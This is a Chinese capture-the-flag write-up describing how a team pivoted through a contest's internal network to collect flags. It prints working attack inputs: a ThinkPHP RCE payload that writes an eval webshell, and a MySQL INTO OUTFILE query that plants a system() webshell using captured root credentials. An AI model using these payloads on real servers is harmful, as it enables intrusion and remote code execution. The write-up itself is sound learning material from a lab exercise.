感谢队友的付出与努力。这次运气不错拿到了二等奖里的最后一名。稍微简单记录下比赛内容吧。
首先知道最终比赛是内网渗透形式还是挺惊讶的。毕竟国内这种形式的攻防比较少见。倒是国外htb赞助的CTF中经常出现。所以做起来还算比较顺畅。最后有几个地方的疑惑不知道还能不能解决......
按顺序记录下得到的flag.
0x01 flag23
首先题目上来就给了个apk......顿时一脸懵逼。姑且先unzip了下。发现里面除了还需要继续反编译的内容外,还存在有网页源码。在www目录下的index.html说明应该存在对应的网页端。而index.html中引入了static里的js文件
直接cat * .js| grep flag
得到flag23
0x02 flag9
队友做的
上面的内容直接爆出了ps.dasctf.wetolink.com。访问后尝试登录。登录失败拿到flag
0x03 flag18
队友做的
既然进不去那就要扫了。很快发现robots.txt中存在swagger-ui.html
进入swagger-ui页面发现注册接口的描述那直接显示flag
0x04 flag19
显然有接口就用接口注册.这里是队友的payload
curl -X POST "http://ps.dasctf.wetolink.com/api/v1/guest/reg" -H "accept: */*" -H "Key: jylsec" -H "Content-Type: application/json" -d "{ \"password\": \"jylsec\", \"username\": \"jylsec\"}"
curl -X POST "http://ps.dasctf.wetolink.com/api/v1/guest/login" -H "accept: */*" -H "Content-Type: application/json" -d "{ \"password\": \"jylsec\", \"username\": \"jylsec\"}"
拿到回显token.解码后其中有flag19
到这一步已经有点熟悉了。让我想起来赵总以前出过的ciscn的一道题。buu上也有复现环境。
0x05 flag22
确认了下回显token后。大致发现这应该是道原题.....
具体参考 CISCN-2019-web部分复现
本来是要paddingoracle+cbc翻转的。确定是原题后直接拿脚本翻转就完了
一开始跑padding oracle跑到一组就崩了......
生成的作为Cookie Key.即可登录后台。
然后就是跟原题一样的ffmpeg的cve直接打
拿到flag22
0x06 flag7
意外收获。上面那块虽然lfi了但是没法rce.所以只能看看有没有其他能利用的点。于是对着域名解析到的ip 192.168.12.253扫了下
直接发现8888端口的web服务robots.txt中藏了flag.
0x07 flag17
8888端口是一个thinkphp。那么自然要尝试rce或者其他攻击了。不过在这期间队友直接找到admin登录处的flag17藏在网页名里。
0x08 flag2
一开始一直在想java那的lfi是不是可以用来读这的文件。结果发现并不可行。其实是因为两者不在一台机器。而是用nginx一起代理的。
所以之后重心果断转向rce.刚好最近在学习thinkphp的原理。我就拿小于5.0.24的postpayload打了一发。
成功rce.
因为s只要接受存在的控制器即可。所以复制粘贴网上的get传值s=captcha貌似是没法复现的。
rce后发现自己没法弹shell.....操作起来还特别卡。快速看了下根目录只有一个flag.sh
/flag.sh
mysql -e "create table flag(flag varchar(256)); insert into flag values('$FLAG');" -uroot -proot test
export FLAG=flag_not_here
FLAG=flag_not_here
似乎是flag在数据库里。
那就更加需要shell了。自己选择了写webshell蚁剑连接。
http://192.168.12.253:8888/?s=index/index
_method=__construct&filter[]=system&method=get&get[]=echo '<?php eval($_REQUEST[byc]);?>' > static/bycshell.php
然而蚁剑的shell似乎是个伪终端?总之我mysql root,root肯定是登不进去了。队友提醒说如果flag是rootroot就能拿的话那肯定被删了。于是我转而找了下thinkphp的配置application/database.php
原来mysql服务是在内网。172.16.237.16.而且拿到一组账户。再次尝试mysql登录却还是不行。不知道是不是因为伪数据的原因。
但是没有关系。既然php能用。我们就可以写php来连接
找了个菜鸟教程上的demo现改了一下。
<?php
$dbhost = '172.16.237.16'; // mysql服务器主机地址
$dbuser = 'root'; // mysql用户名
$dbpass = 'cec720a374e4eb8a'; // mysql用户名密码
$conn = mysqli_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{
die('连接失败: ' . mysqli_error($conn));
}
// 设置编码,防止中文乱码
mysqli_query($conn , "set names utf8");
$sql = 'SELECT * from flag';
mysqli_select_db( $conn, 'flag' );
$retval = mysqli_query( $conn, $sql );
if(! $retval )
{
die('无法读取数据: ' . mysqli_error($conn));
}
$row = mysqli_fetch_array($retval, MYSQLI_ASSOC);
var_dump($row);
试了一会发现faka数据库根本没有flag表。然后也没有test这个数据库。那flag.sh里的东西是骗人的?抱着试一试的想法我尝试了下flag数据库。结果就成了
0x09 flag1
回过头再找其他线索时。终于发现home目录下遗漏了两个flag.txt
其中flag1.txt直接可读。flag5.txt需要提权到root。
到这里就是我们队全部得到的flag了。虽然没有题目拿血,但是整体速度还是比较快的。冲到1000分时刚好并列第四。可惜后期没啥思路了,止步于此。
unfinished
其实除了提权以外还有地方深挖了下。
提权因为要root。我简单ps aux看了下靶机没有root运行的服务。那基本上不可能利用服务提权。不排除使用mysql的密码直接su到root。但是因为蚁剑是假shell所以执行不了su.而我不知道要怎么在这种环境弹shell.所以作罢。猜测可能是内核提权或者直接密码su吧。
然后我在mysql所在的机器172.16.237.16下了点功夫。既然他是root用户那么应该是有读写文件的权限的。于是尝试了下果然可以。并且那台机器有php运行。可以写入webshell.
具体直接把上面读flag的php文件里sql那句改成写文件即可
$sql = "SELECT '<?php system(\$_REQUEST[byc])?>' into outfile '/var/www/html/bycshell6.php'";
然而即使已经在那台机器上rce了。还是没能找到flag.....不知道是不是要提权。还是它本来就是没啥用的机器。
加上靶机没python.蚁剑没插件。所以扫不了内网c段。最后面时间就把重心放提权跟16这台机器上了。
summary
总体上这次比赛比较幸运。一方面从最后成绩来说比较满意;另一方面出题人没有放比较显眼的windows机器算是让我松了一口气。毕竟如果真是域渗透那就很难有所突破了。
难度上自然是不难的。甚至有几个白给的flag.不过对于渗透习惯要求还是有的。比如从文件下手找敏感信息。遇到域名找ip。ip找端口。找到服务再找exp试着打。打完再扫内网......这时才感慨做htb收获的更多是耐性与良好的渗透习惯及基本功。
现在因为要去准备开学后的期末了,所以估计不会花太多时间学新知识了。不过坑肯定还是会填的。希望能在国赛取得好成绩吧。
